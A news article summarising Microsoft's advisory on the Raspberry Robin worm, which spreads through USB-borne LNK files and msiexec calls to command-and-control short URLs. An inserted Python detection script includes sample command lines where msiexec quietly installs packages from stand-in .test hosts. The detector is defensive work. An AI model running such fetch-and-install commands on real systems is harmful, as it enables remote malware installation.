
Microsoft finds Raspberry Robin worm in hundreds of networks

published on 2022-07-11 11:26:29 UTC by
Content:

Microsoft has released an official intelligence advisory warning of a Windows worm dubbed ‘Raspberry Robin’ which is infecting the networks of hundreds of organisations.

The malware was first seen in September 2021 with infections observed in organisations that have ties to technology and manufacturing sectors.

Raspberry Robin is typically introduced via infected removable drives, often USB devices that include a [.]LNK file masquerading as a legitimate folder (a LNK file is a Windows shortcut, which points to and is used to open another file).

When a user clicks on this file, the malware launches another malicious file by starting an msiexec[.]exe (Windows Installer) process, which attempts to connect to a short URL to communicate with command-and-control (C2) servers controlled by the threat actors.

If the connection is successful, the final step consists of the C2 servers downloading further malicious dynamic-link libraries (DLLs - a collection of small programs that larger programs can load when needed to complete specific tasks) that are suspected of being used to gain persistence on compromised systems.
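The msiexec step above is the easiest point in this chain to detect from process-creation logs. The sketch below is an added example, not code from Microsoft or the original article; the event records, the `.test` hosts, the host-length threshold, the parent-process list and the quiet-flag check are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation records; hosts use the reserved .test TLD
# and are not real indicators.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'msiexec /q /i "http://ab1.test:8080/x"'},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\agent.msi /qn"},
    {"image": r"C:\Windows\System32\MSIEXEC.EXE", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mSiExEc -Q -I hTTp://q9.test/aB"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Program Files\Vendor\updater.exe",
     "cmdline": "msiexec /i https://downloads.vendor-updates.test/agent.msi /qn"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SHORT_HOST_MAX = 10  # assumption: longest host name still treated as "short"
SHELL_PARENTS = {"cmd.exe", "explorer.exe", "powershell.exe"}  # assumption

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess(event):
    """Return None if the event does not match, else the findings as a dict."""
    if basename(event["image"]) != "msiexec.exe":
        return None
    urls = URL_RE.findall(event["cmdline"])
    if not urls:
        return None  # local package install, not the pattern described
    reasons = ["msiexec given a remote URL"]
    host = urlsplit(urls[0]).hostname or ""
    if len(host) <= SHORT_HOST_MAX:
        reasons.append("short host name")
    if basename(event["parent"]) in SHELL_PARENTS:
        reasons.append("launched from an interactive shell")
    if re.search(r"(?i)(^|\s)[/-]q", event["cmdline"]):
        reasons.append("quiet install flag")
    severity = "high" if len(reasons) >= 3 else "medium"
    return {"url": urls[0], "severity": severity, "reasons": reasons}

def scan(events):
    """Return (index, findings) for every event that matches."""
    return [(i, r) for i, e in enumerate(events) if (r := assess(e))]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding["severity"], finding["url"], finding["reasons"])
```

Legitimate software deployment tools also pass URLs to msiexec, so the medium-severity hits need an allow-list of known update hosts before this is used for alerting.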

While there has been significant research carried out and several infections identified, researchers are yet to attribute Raspberry Robin to a threat group and the objectives of the malware remain unanswered at this stage.

However, Microsoft has tagged this campaign as high-risk given that Raspberry Robin could not only be used by threat actors as an entry point into the target network but could also allow them to download and deploy additional malware within the victims' networks and escalate their privileges at any time.


Reporting

Report all Fraud and Cybercrime to Action Fraud by calling 0300 123 2040 or online. Forward suspicious emails to report@phishing.gov.uk. Report SMS scams by forwarding the original message to 7726 (spells SPAM on the keypad).



https://www.emcrc.co.uk/post/microsoft-finds-raspberry-robin-worm-in-hundreds-of-networks   
Published: 2022 07 11 11:26:29
Received: 2022 07 12 08:14:57
Feed: The Cyber Resilience Centre for the East Midlands
Source: National Cyber Resilience Centre Group
Category: News
Topic: Cyber Security